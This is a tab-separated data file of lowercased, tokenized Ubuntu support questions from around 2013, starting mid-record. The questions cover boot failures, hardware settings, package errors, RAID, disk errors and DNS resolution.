numbers 2 and 3 can be fixed by installing or reinstalling freespace 2 . '' at graphics/2d.cpp:645
262664	what about `` write apps for all ubuntu devices ``	on http : //www.ubuntu.com/devices/phone/app-ecosystem ubuntu writes about creating one app for all devices , seperated only by the currently offered ui ( tablet , phone , desktop ) . due desktop apps are using quickly for development ( gtk-based ) and phone and tablet are using qml ( qt-based ) , i really wonder how i should start porting a user interface for an existing native application . wether i created the core-application in quickly or as a commandline ( which should be an advantage comparing to the quickly-solution i guess ) i do n't have a clue to extend this existing app to offer a phone/tablet interface if needed . and how should i start if i want to write an app that shall be available on each form factor ? i mean one core app and two or three uis . both would be very interesting for me to understand how i can plan my development without having the need and anger of rewriting/multiplying the core of the app to work on all form factors . thanks for advice and if such information exists , post a link on the above page so a developer can get information about writing multi-platform apps . regards andrăš
262666	is it possible to download updates of ubuntu 12.10 manually somewhere else and then install later ?	i actually want to use my mobile to download updates as my internet is not so fast and i have to keep my computer running for a long time to install them . i want to download them in my mobile and then install later by transferring them to computer .
262667	is an acer c7 chromebook worth buying as an ubuntu netbook ?	i apologies for non technical question . i 'm really low on budget , and considering buying new netbook for starting using ubuntu , after a lame win 8 decided to move on linux based systems . so for the starter i want to move on ubuntu step by step . i choosed acer c7 chromebook mostly for it 's price , and seem all technical characteristics are enough to run ubuntu . i 've read a lot of reviews on acer c7 with chrubuntu , but still have some question . as i understand this chrubuntu is n't an official project , and canonical does n't support it . also it seems that some users do have a little troubles with 12.10 version , like sound for mic and ets . so what 's going to happen with 13.04 ? does this acer c7 worth buying as ubuntu netbook ? appreciate your advices .
262668	i am having difficulties reinstalling 12.10 and need help	my reinstall of ubuntu 12.10 seems to be taking forever . i see occasional notes that come up in the small window reporting events , but they mean nothing to me . i was tempted to hit the having trouble link during the reinstall and am still in that mode . i told it to save installed programs and i presently have about 146 programs installed . the troubles began when ubuntu would not boot well with a message `` mount failed , '' referring to about 6-different failures following the `` mount : '' message , and then ending with `` instmfts , '' or something to that effect . i went to the `` help '' menu , i typed in `` mount '' which for a time seemed to mount manually , followed by `` reboot '' which for a time worked pretty well . however , over time , this procedure did not work at all , and i would have to use a repair disk just to boot . once i shut down , it would occasionally reboot , but more and more i needed to use the boot repair each time , which did not seem to repair anything permanently . please help . i have also tried and apparently succeeded at reinstalling grub . i am not well skilled at programming but have enough knowledge to get into the terminal and to change and list files in various directories , but that is about all . otherwise , i am loving ubuntu
262671	touchpad tab is missing but ubuntu detects	i have installed ubuntu 12.04 but when i got to mouse settings , touchpad tab is missing . ubuntu detects it . shahzeb @ shahzeb-laptop : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ hp webcam id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys id=12 [ slave keyboard ( 3 ) ] i am using hp dv6 . kindly help me , i shall be thankful .
262672	ubuntustudio is not loading even after its succesfull installation	i have installed windows7 , later on i installed ubuntu 12.04 . it installed succesfully , but dint show up after restarting at the end . and as it did not load , i took the chance of installing ubuntu studio in the same partition ( i freed the space , did all the routines ) . its the same now also . just my windows7 loads . can anyone please guide me in fixing this issue !
262674	how do i change the current working directory to the downloads directory ?	how do i change directories to downloads , from the home folder , in the latest version ubuntu 12.10 ? i tried cd /downloads , but it gave an error saying that there is no such directory .
262676	why wo n't ubuntu use my ethernet cable ?	i have ubuntu 12.04 lts and for some reason , ubuntu will not use an ethernet cord . it will recognize it and say that i have a connection , but it wo n't access the internet through it . i plan to use ethernet to upgrade , as it is a more steady connection with better speeds than my wireless , and it worked before ... why wo n't it work now ? the wifi works great , stays connected better than windows , but when i plug in the ethernet , kaput . no more internet . it wo n't connect again unless i unplug the ethernet cord . ? ? ?
262677	full screen with gnome-player and vlc not working properly	i 've got this problem since the very first minute i installed lubuntu from scratch . full screen mode is not working properly in both gnome-player and vlc : how can i fix this ? i 'm on a mini dell inspiron 1210 , graphic card : 00:02.0 vga compatible controller : intel corporation system controller hub ( sch poulsbo ) graphics controller ( rev 07 )
262681	high-performance mail transport agent6 postfix install failure	continual install failure of -- high-performance mail transport agent6 postfix ( size : 1.3mb ) -- - i believe this is also affecting my ability to stay connected to my mail accounts . how do i fix this ? this is my home computer . here is the error msg : installarchives ( ) failed : setting up postfix ( 2.9.3-2~12.04.3 ) ... postfix configuration was not changed . if you need to make changes , edit /etc/postfix/main.cf ( and others ) as needed . to view postfix configuration values , see postconf ( 1 ) . after modifying main.cf , be sure to run '/etc/init.d/postfix reload ' . running newaliases newaliases : warning : valid_hostname : numeric hostname : 1 newaliases : fatal : file /etc/postfix/main.cf : parameter mydomain : bad parameter value : 1 dpkg : error processing postfix ( -- configure ) : subprocess installed post-installation script returned error exit status 75 no apport report written because maxreports is reached already processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : postfix localepurge : disk space freed in /usr/share/locale : 0 kib localepurge : disk space freed in /usr/share/man : 0 kib localepurge : disk space freed in /usr/share/gnome/help : 0 kib localepurge : disk space freed in /usr/share/omf : 0 kib localepurge : disk space freed in /usr/share/doc/kde/html : 0 kib total disk space freed by localepurge : 0 kib localepurge : disk space freed in /usr/share/locale : 0 kib localepurge : disk space freed in /usr/share/man : 0 kib localepurge : disk space freed in /usr/share/gnome/help : 0 kib localepurge : disk space freed in /usr/share/omf : 0 kib localepurge : disk space freed in /usr/share/doc/kde/html : 0 kib total disk space freed by localepurge : 0 kib localepurge : disk space freed in /usr/share/locale : 0 kib localepurge : disk space freed in /usr/share/man : 0 kib localepurge : disk space freed in /usr/share/gnome/help : 0 kib localepurge : disk space freed in /usr/share/omf : 0 kib localepurge : disk space freed in /usr/share/doc/kde/html : 0 kib total disk space freed by localepurge : 0 kib localepurge : disk space freed in /usr/share/locale : 0 kib localepurge : disk space freed in /usr/share/man : 0 kib localepurge : disk space freed in /usr/share/gnome/help : 0 kib localepurge : disk space freed in /usr/share/omf : 0 kib localepurge : disk space freed in /usr/share/doc/kde/html : 0 kib total disk space freed by localepurge : 0 kib error in function : setting up postfix ( 2.9.3-2~12.04.3 ) ... postfix configuration was not changed . if you need to make changes , edit /etc/postfix/main.cf ( and others ) as needed . to view postfix configuration values , see postconf ( 1 ) . after modifying main.cf , be sure to run '/etc/init.d/postfix reload ' . running newaliases newaliases : warning : valid_hostname : numeric hostname : 1 newaliases : fatal : file /etc/postfix/main.cf : parameter mydomain : bad parameter value : 1 dpkg : error processing postfix ( -- configure ) : subprocess installed post-installation script returned error exit status 75 processing triggers for libc-bin ... ldconfig deferred processing now taking place
262686	how to resolve sd card boot error `` init : failed to spawn hostname main process : unable to execute : no such file or directory '' ?	i 'm trying to generate a bootable sd card for the texas instruments am335x starter kit . the am335x is a cortex-a8 ( arm ) . bootloader is working : uboot , directly from texas instruments kernel is working : 3.2.0 , directly from texas instruments rootfs is not working : ubuntu-core-12.04.2-core-armhf.tar.gz i 'm following these steps : formatting the sd card with 2 partitions , one fat16 ( boot ) and one ext3 ( rootfs ) placing the bootloader + kernel + mlo + uenv.txt in the boot partition till here everything is ok with other rootfs , the next steps are for ubuntu-core untar the ubuntu-core tarball in the rootfs partition updating fstab with : /dev/mmcblk0p2 / auto errors=remount-ro 0 1 /dev/mmcblk0p1 /boot/uboot auto defaults 0 0 follow the steps in this tutorial for serial.conf http : //www.omappedia.com/wiki/omap_ubuntu_core # chroot.27ing_into_the_ubuntu_core_filesystem boot the sd card the last lines of my log are : [ 5.041076 ] kjournald starting . commit interval 5 seconds [ 5.724517 ] ext3-fs ( mmcblk0p2 ) : using internal journal [ 5.730010 ] ext3-fs ( mmcblk0p2 ) : recovery complete [ 5.738250 ] ext3-fs ( mmcblk0p2 ) : mounted filesystem with ordered data mode [ 5.745574 ] vfs : mounted root ( ext3 filesystem ) on device 179:2 . [ 5.752410 ] freeing init memory : 248k [ 6.035400 ] init : failed to spawn hostname main process : unable to execute : no such file or directory anyone has an hint or an idea ?
262690	installing arm development studio on ubuntu 12.10	i 'd like to install an arm development studio environment on ubuntu 12.10 . i googled it , but did n't find anything useful . can anyone help me , please .
262698	how do i get passwords from the keyring in the terminal for usage in scripts ?	when you have a luks encrypted drive in your computer , nautilus or nemo will show it under devices as a drive with a little lock on it . when you click it , you need to enter a password . if you choose to remember this password forever , it gets saved to your keyring . next boot , clicking on the drive will immediately mount it . how do i 'immediately mount ' such a drive for which the passphrase is stored in the keyring , from the terminal ? i want to have an autostart script that will mount my luks drive when i log in . i do not want to store my passphrase in the script , i want to use the passphrase from the keyring : if you go to passwords and keys , there 's a bunch of nameless keys . in their properties you can find a description like gvfs-luks-uuid=xxxxxxxxxxxx and also the password for that luks drive . this is what ubuntu uses . one option i thought about is python-gnomekeyring but it can only get the keyname and password . i need what the gui calls 'technical details ' to get the password for a specific uuid because the keyname is always empty .
262699	why does ubuntu not boot into a 3.4-kernel ?	i just need to install kernel 3.4 ( or higher stable version ) on my machine ( with 8gb ram ) running ubuntu 11.10 . i did the following steps : i downloaded the following deb files : linux-headers-3.4.0-030400_3.4.0-030400.201205210521_all.deb linux-headers-3.4.0-030400-generic-pae_3.4.0-030400.201205210521_i386.deb linux-image-3.4.0-030400-generic-pae_3.4.0-030400.201205210521_i386.deb i installed them by , sudo dpkg -i *.deb i restarted the machine and i selected kernel 3.4 from grub menu . ubuntu hangs there and never comes up ( i waited for a few minutes ... ) . i have nvidia graphic card installed properly . if i restart the computer and select kernel 3.0 from grub menu , it boots up normally without any problem . i do n't know what is the problem , but i guess that i should find a way to install nvidia linux driver on kernel 3.4 , but how i can do this while it gets stuck at boot up ?
262700	qemu kvm vnc support	do i need to install a special package to get the vnc support ? i installed : sudo apt-get install kvm qemu-kvm qemu-kvm-extras everything works fine , i only get no vnc server up and running , although its configured for the vm . maybe this is a firewall problem since i can connect locally .
262702	winxp option not showing during boot	i have ubuntu 12.10 installed along with windows xp . suddenly today when i booted the grub menu is not showing the windows xp option . the only options shown are to boot in ubuntu , memtest , advanced boot . i am sure i did not mess around with any files . how can i put winxp back in grub menu ?
262711	ubuntu 13.04 64bit . brightness does n't work on lenovo yoga 13	there is solution for 12.10 , but it does n't work for 13.04 . ( build from 28february ) any idea what is wrong with 13.04 version and how to fix it ? additional info : in /sys/class/backlight/ i have : ideapad and intel_backlight , no signs of acpi_video0
262715	is there a program or somehow to get mousekeys on ubuntu 12.04	mousekeys is a feature on windows that allows you to press buttons on your keyboard and your mouse goes to in a certain direction and certain distance . is there a program or built in feature like this in ubuntu 12.04 ?
262716	activate spare for raid-5 in disk utility	i have a raid-5 . i 'm trying to replace a failing drive in disk utility gui . i added a new drive as a spare , then did `` remove component '' for the failing drive . how do i tell it to actually use the spare ( write all the parity data , etc ) ? i tried re-adding , because i got nervous ... $ sudo mdadm /dev/md127 -- re-add /dev/sdd mdadm : -- re-add for /dev/sdd to /dev/md127 is not possible
262717	ubuntu 12.04 ssd root frequent random read only file system	i really need your help . i 've got dell inspiron 1545 with 8gb of ram and sandisk extreme 240gb ssd . the disk is seperated into three partitions , /root , /swap - 8gb , /home blkid : /dev/sda1 : uuid= '' 7cd24cc2-ad1a-4601-944a-b958c002c09b '' type= '' ext4 '' /dev/sda3 : uuid= '' 2cce638f-c3fd-44e8-8787-e2df10f7b593 '' type= '' ext4 '' /dev/sda5 : uuid= '' 27fa814e-c4e8-4622-b115-bb1f3537971e '' type= '' swap '' /dev/zram0 : uuid= '' a286239a-f0bc-405d-b355-e4c8f7db29da '' type= '' swap '' i keep having random system problems which force me to restart and when i do that , on boot it goes through file system checks and asks me to press f to fix errors . i checked the drive for bad sectors and errors , it was clean , as well as s.m.a.r.t . report and could not see any problems . i 've reinstalled the os and the problem is still happening . it happens at random and sometimes during high disk usage or just after a normal shutdown . here my fstab , i 've modified it in hope it would help but the it did n't change much : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=7cd24cc2-ad1a-4601-944a-b958c002c09b / ext4 discard , noat $ # /home was on /dev/sda3 during installation uuid=2cce638f-c3fd-44e8-8787-e2df10f7b593 /home ext4 discard , noat $ # swap was on /dev/sda5 during installation uuid=27fa814e-c4e8-4622-b115-bb1f3537971e none swap sw $ tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 i 've been googling for last week and a half about this problem and still can not find a way to fix it . some people saying that the problem is cause by the kernel update and the ext4 file system . uname -a : linux juri-laptop 3.5.0-25-generic # 39~precise1-ubuntu smp tue feb 26 00:11:13 utc 2013 i686 i686 i386 gnu/linux i 'm not an expert in linux , so please be gentle with me on some command and reports . thank you in advance guys . juri edited - better copy of fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=7cd24cc2-ad1a-4601-944a-b958c002c09b / ext4 discard , noatime , nodiratime , errors=remount-ro 0 1 # /home was on /dev/sda3 during installation uuid=2cce638f-c3fd-44e8-8787-e2df10f7b593 /home ext4 discard , noatime , nodiratime , defaults 0 2 # swap was on /dev/sda5 during installation uuid=27fa814e-c4e8-4622-b115-bb1f3537971e none swap sw 0 0 tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 here are some snippits of my dmesg log , hopefully this might shed some light on the problem . i 've search `` error '' in the file and here is what i 've got : [ 4.167274 ] ext4-fs warning ( device sda1 ) : ext4_clear_journal_err:4407 : filesystem error recorded from previous mount : io failure [ 4.167278 ] ext4-fs warning ( device sda1 ) : ext4_clear_journal_err:4408 : marking fs in need of filesystem check . [ 9.487927 ] ext4-fs ( sda1 ) : re-mounted . opts : discard , errors=remount-ro [ 24.081103 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) [ 24.081110 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) [ 24.081115 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) [ 24.081117 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) [ 24.081122 ] error @ wl_dev_intvar_get : error ( -1 ) [ 24.081124 ] error @ wl_cfg80211_get_tx_power : error ( -1 ) [ 42.749595 ] res 51/40:20 : e8:68:5d/00:00:07:00:00/40 emask 0x409 ( media error ) < f > [ 42.749600 ] ata1.00 : error : { unc } [ 42.770408 ] sense key : medium error [ current ] [ descriptor ] [ 42.770434 ] add . sense : unrecovered read error - auto reallocate failed [ 42.770448 ] end_request : i/o error , dev sda , sector 123562216
262718	is this something to be concerned about ?	i saw this on details : i 'm using an acer aspire one d255e 1.66 ghz processor 1 gb ram 64 bit intel atom windows 7 ultimate and ubuntu are dual-booted . should i be concerned about this ?
262720	i ca n't download remastersys	i want to creat a remaster with remastersys , i have remastersys 3.0.3 . i created the iso file with that but it do n't accept my user & pass , user=custom , pass=blank now i want to use remastersys 3.0.4 or above . remastersys repository is shut in my country . please help me and send me remastersys file or upload it for me and my countrymans . thanks yaser.amiri95 @ gmail.com
262723	wrong battery state reading cause brutal shutdown	i have an asus zenbook ux31a , the asus 13 '' unit from first generation ultrabooks . i run ubuntu 12.10 up to date on it . before a week or two i used to enjoy more that 5 hours of battery life , especially when watching movies with vlc and hardware accelerated playback . i ca n't link my issue to some update i did but for several days now and after about 2 to 3 hours , my laptop shutdown abruptly without warning for critical nor low battery level . i suspect this is battery related since the battery charge curve show that the battery charge plummets from 50-40 % to 0 % before the shutdowns . upon reboot , i have to run a `` killall xorg '' since the greeter wo n't load and drop me to something like a black console with lines about battery i ca n't remember on top of my head right now and an arrow cursor . after a while , usually 1 to 3 minutes , the laptop shutdown again . i ca n't pinpoint the component that cause this . i know it 's a software problem since after such an event i ca n't run it for at least 1h30 in windows without issues . i lost patience after that but it reported still 1h of autonomy when i powered it off . any hint on how to solve or at least identify the culprit ? any log i can check maybe ? thanks .
262732	thunderbird hangs at startup	i am facing issues while running thunderbird after system restart . tb is hanging while taking up 100 % of memory , and cpu utilization is 100 % . which is why system does not respond after sometime . i found the issue is with tb only . because , without running tb , system is performing well and no issue is there . this issue happening while i have made hard reset to my laptop and that time virtual box also running . please help me to fix the issue . thanks in advance !
262733	where have the full package descriptions gone ?	once upon a time , if i wanted to know what a particular ( uninstalled ) packages was for , i could go apt-cache show < package > and it would produce a slew of information , including a good couple of paragraphs describing the package . this has changed recently . now the `` description '' field is only ever one line . on an older , system , it goes : mslade @ natty1 : ~ $ apt-cache show apt [ snip ] description : advanced front-end for dpkg this is debian 's next generation front-end for the dpkg package manager . it provides the apt-get utility and apt dselect method that provides a simpler , safer way to install and upgrade packages . . apt features complete installation ordering , multiple source capability and several other unique features , see the users guide in apt-doc . and now : mslade @ mickpc : ~ $ apt-cache show apt [ snip ] description : commandline package manager the long descriptions are still in the package files , and you can query them with dpkg -s if you 've already installed them , but this is n't helpful if you just want to know more about some package that was mentioned on some web site . i have searched everywhere for some source for these descriptions . the best i have some up with so far is , download the .deb file and run dpkg-deb -i on it . this is really overkill if all you want is the metadata . is there a better way ? update : i just installed a new pangolin vm and noticed its apt-cache show gave long descriptions , until i fudged /etc/apt/sources.list to use my own mirror , produced with debmirror . i suspect debmirror is the culprit .
262736	why i get a blank screen at boot of ubuntu 12.04 livecd ?	hello i have downloaded the ubuntu 12.04 live iso and alternate iso for ppc g5 . i put them everyone in a cd and try to boot it holding c at restart and so far the only thing that i get is a blank screen , nothing else , no icon , no terminal , no nothing . i have luck with lubuntu 12.04 , not with ubuntu . but i need ubuntu . any ideas ? my ppc mac g5 early 2006 dual 2ghz , 1gb ram , 1tb hdd , nvidia geforce 6600 256mb hd screen .
262738	installing ubuntu 12.10 - performance issues	first question ever , well i 'm trying to install ubuntu 12.10 in my laptop , however its laggy , slow , ca n't do anything , can barely install it . tryed with wubi , did n't work so well , went for a usb install , my partition table was n't able to create a partition , now i 'm doing it manually and will try to install again . even tested with kubunto to ditch unity , still slow , unbearable , taking 5 mins to open anything . i dont know what the problem is , my laptop meets the requirements , i think . specs : geforce 240m 4gb ram intel core 2 duo t9600 2.8ghz what do you guys think , really need to study a but in ubuntu ( bash and c pipes bah ) , is it the fail graphics card ? anything that i should be doing ? thanks in advance roger ( sorry for bad english )
262740	why doesnot my software center open in ubuntu 12.04	i installed ubuntu 12.04 32 bit for the first time in my laptop.the software center jut doesnot open and i can not understand why ? when i tye software center in the terminal i get the following messages > 2013-03-01 21:30:31,312 - softwarecenter.ui.gtk3.app - info - setting > up proxy 'none ' 2013-03-01 21:30:31,316 - softwarecenter.db.database - > info - open ( ) database : path=none use_axi=true use_agent=true > 2013-03-01 21:30:31,317 - softwarecenter.db.database - error - failed > to add apt-xapian-index traceback ( most recent call last ) : file > `` /usr/share/software-center/softwarecenter/db/database.py '' , line 179 , > in _get_new_xapiandb > softwarecenter.paths.apt_xapian_index_db_path ) file `` /usr/lib/python2.7/dist-packages/xapian/__init__.py '' , line 3666 , in > __init__ > _xapian.database_swiginit ( self , _xapian.new_database ( *args ) ) databaseopeningerror : could n't stat '/var/lib/apt-xapian-index/index' > ( no such file or directory ) 2013-03-01 21:30:31,588 - > softwarecenter.backend.reviews - warning - could not get usefulness > from server , no username in config file traceback ( most recent call > last ) : file > `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , > line 242 , in open > self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ > self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open > self._list.read_main_list ( ) systemerror : e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) 2013-03-01 21:30:32,240 > - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2013-03-01 > 21:30:32,464 - softwarecenter.db.categories - warning - sort by > cataloged time requested but your a-x-i does not seem to support that > yet 2013-03-01 21:30:32,537 - softwarecenter.db.categories - warning - > sort by cataloged time requested but your a-x-i does not seem to > support that yet 2013-03-01 21:30:32,574 - > softwarecenter.db.categories - warning - sort by cataloged time > requested but your a-x-i does not seem to support that yet 2013-03-01 > 21:30:32,610 - softwarecenter.db.categories - warning - sort by > cataloged time requested but your a-x-i does not seem to support that > yet 2013-03-01 21:30:32,653 - softwarecenter.db.enquire - error - > _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file > `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , > in _get_estimate_nr_apps_and_nr_pkgs > tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line > 89 , in __call__ > if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , > line 262 , in __contains__ > return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__ ' traceback ( most recent call > last ) : file `` /usr/bin/software-center '' , line 176 , in > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1341 , > in run > self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1271 , > in show_available_packages > self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , > line 149 , in set_active_view > view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , > line 165 , in init_view > self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , > line 240 , in __init__ > self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , > line 491 , in build > self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , > line 267 , in _build_homepage_view > self._append_top_rated ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , > line 404 , in _append_top_rated > top_rated_cat = self._update_top_rated_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , > line 391 , in _update_top_rated_content > docs = top_rated_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line > 124 , in get_documents > nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , > in set_query > self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , > in _blocking_perform_search > matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , > in __call__ > if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , > line 262 , in __contains__ > return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
262742	apt-get update errors ( ca n't read the package lists )	after running the an update from the update-manager i tried to install chromium : sudo apt-get install chromium-browser and i got the following error ( full output from `sudo apt-get update ' on ubuntu pastebin ) : reading package lists ... error ! e : malformed 2nd word in the status line e : error occurred while processing curl ( usepackage3 ) e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . working from this answer i guessed there was something wrong with my mergelist . so per the top answer , i removed the merge list . sudo rm /var/lib/apt/lists/* -vf then i attempted an update . sudo apt-get update and got the same set of error messages . my next thought was that one of the repos i had added was faulty in some manner . /etc/apt/sources.list was full on canonical sources and nothing else . etc/apt/sources.list.d had a few 3rd party sources i had added ( namely heroku and chris lea 's node.js ) . just in case i cleared out that directory with sudo rm * . then deleted the mergelist , and attempted an update . same error . what might be causing this set of errors and how do i correct it ?
262746	why wo n't startup disk writer write the latest ubuntu iso to dvd-rom ? ( ubuntu 12.04 lts )	i downloaded the ubuntu 12.10 desktop iso from the ubuntu website , md5 checked it and its fine . however , when i put a sony dvd-r accucore 4.7gb disk in , ubuntu recognizes it and allows me to write my own files ( .doc , .exe , .txt , etc ... ) to it , but for some reason brasero and startup disk creator both do n't recognize it and refuse to write the iso to the disk ? ? ?
262748	why is this single-word address being resolved ?	i 'm running ubuntu 12.04 . on my work network , there 's a single-word address ( let 's call it foobar ) that is responding to pings and http requests , only from my machine . the address is not a tld , just a generic , project-related acronym . said address should n't be responding : there 's no foobar entry in my /etc/hosts file . there 's no reference to foobar in apache 's httpd.conf , sites-available or sites-enabled , neither on my resolv.conf file , as follows : nameserver 127.0.0.1 search redacted.mycompany.com initially i thought it was redirecting to localhost , but if i open it on my browser it shows the nginx welcome page , and i 'm running apache on my machine . sniffing lo and eth0 shows the traffic is indeed coming from the network . restarting the resolvconf service does n't fix the issue . if i run : service resolvconf stop resolvconf -- wipe-runtime-directories service resolvconf start then foobar stops resolving , but if i restart my machine it resolves again pinging foobar gets a reply from foobar.redacted.mycompany.com , a real address that works fine for other machines besides my own . tracerouting or mtr'ing foobar shows a 5 hops until the destination , the same as tracerouting or mtr'ing foobar.redacted.mycompany.com . here 's the output of the dig foobar command : ; < < > > dig 9.8.1-p1 < < > > foobar ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : nxdomain , id : 52484 ; ; flags : qr rd ra ; query : 1 , answer : 0 , authority : 0 , additional : 0 ; ; question section : ; foobar . in a ; ; query time : 1 msec ; ; server : 127.0.0.1 # 53 ( 127.0.0.1 ) ; ; when : fri mar 8 14:32:02 2013 ; ; msg size rcvd : 22 the issue happens both on firefox ( 19.0 ) or chrome ( 24.0.1312.56-0ubuntu0.12.04.1 ) . pressing ctrl+f5 does n't change anything . it does n't happen on other two coworker 's machines i 've tested on the same subnetwork .
262749	installing ubuntu so that it can be removed without trace	i would like install ubuntu on a laptop in a way that if i was to remove it , there would be no trace that i had installed it . i would dual boot it with windows 7 . please could someone provide details of how i would go about removing it .
262754	how do i disable double-click drag in ubuntu ?	i can find an option in the mouse settings to bring the drag and drop time threshold to very small , which helps with accidental events , but i ca n't find an option to disable it all together .
262755	can change background only from gnome , not from unity	i just upgraded my ubuntu from 12.04 to 12.10 and i see when i right click on the desktop and click on change desktop background , all i get is the system settings dialogue and not the change desktop wallpaper dialogue . how can i get it back ? update : ( updated the title ) i logged in using gnome session and there when i click on change desktop background i am able to change the desktop background . and when i do the same on unity i am not able to do anything . it just takes me to the settings page .
262757	ubuntu boot problem - ata4.00 : error	i am having serious problems with my computer right now . any help would be greatly appreciated ! here is the story : ) looking for speed i decided to install ubuntu 10.04 lts about two months ago . it was working great for a month . absolutely no problems . it was fast while using and it booted up and shut down incredibly fast too . after realizing some ppas just dont support 10.04 anymore and wont ever again , i decided to upgrade to 12.04 lts . everything went smooth . upgrade was fine . then i noticed boot problems a few days later . lots of error messages . sometimes the hard drive would `` decide '' on its own to go into read only mode while i was using the computer throughout the day . i couldnt save files any longer , i couldnt save open tabs in browsers , i couldnt copy files , i could not open programs , etc . in short , the computer or the hard drive went `` read only '' on me . i noticed more problems on boot . for example , sometimes it would just never boot up . it might go to a grub > prompt or not even get that far . one of the errors i always see on boot is this ... an ata4 error message ... ata4.00 : error : { icrc abrt } this became crippling for me . i could no longer get things done if i could get the computer to boot up at all . originally wanting ubuntu 10.04 for its speed and stability , i played around with a few other oses like xubuntu , lubuntu & mint , but settled on the new elementary os luna still in beta . install went great . used it for a couple days , then the dreaded read only hard drive problem started up again . now i can barely boot up into my system . ( im using it now and trying to type fast in case it goes into read only mode ! ) . here is a reoccurring error grouping that happens on just about every boot . essentially i see if the computer can get passed the errors it will boot , if it cant it goes to grub or locks up . http : //paste.ubuntu.com/5576745/ in short : 10.04 worked flawlessly 12.04 had all sorts of problems elementary os luna ( newest beta ) same problems not sure where to go from here on this . ive read so many forums and pages and comments about this type of error message . from changing the hard drive cable , to changing the hard drive , to running all sorts of terminal commands . any ideas would be so helpful . thank you so much ! ps ... if i cant figure this out , im considering re-installing ubuntu 10.04 and see if it runs stable again . that would be very interesting indeed . pps ... disk utility shows smart status of my hard drive as healthy
262758	removing the filesystem quota on a partition	i want to install dovecot on ubuntu 12.04 lts , and it recommends that we place the control files into a partition which will not be limited by the filesystem quota . if i create an ext4 partition with 2 gigs , how do i remove the quota on that partition ? i know the partitions are defined in /etc/fstab , and i think usrquota and grpquota have to be explicitly set to disabled . but i am unsure what the entire line should look like . is it something like : /dev/hda2 / ext4 defaults , usrquota , grpquota 1 0 0 on the other hand , i found something called quotaon and quotaoff . would this be used instead of fstab ? is there a difference ?
262763	why is the command line needed to erase cds and dvds	ubuntu 12.10 newbie questions . why do you have to use command prompts to erase cds & dvds on ubuntu 12.10 when it has disc burning software like brasero ? those commands are not working . i do not see an option for tools any where on the program .
262769	is 1.abc ! `` ! +123 a valid file name ?	is this a valid file name 1.abc ! `` ! +123 in ubuntu ? i issued the command rm 1.abc ! `` ! +123 and got error message -bash : ! `` ! +123 : event not find why ? how to i delete the file ?
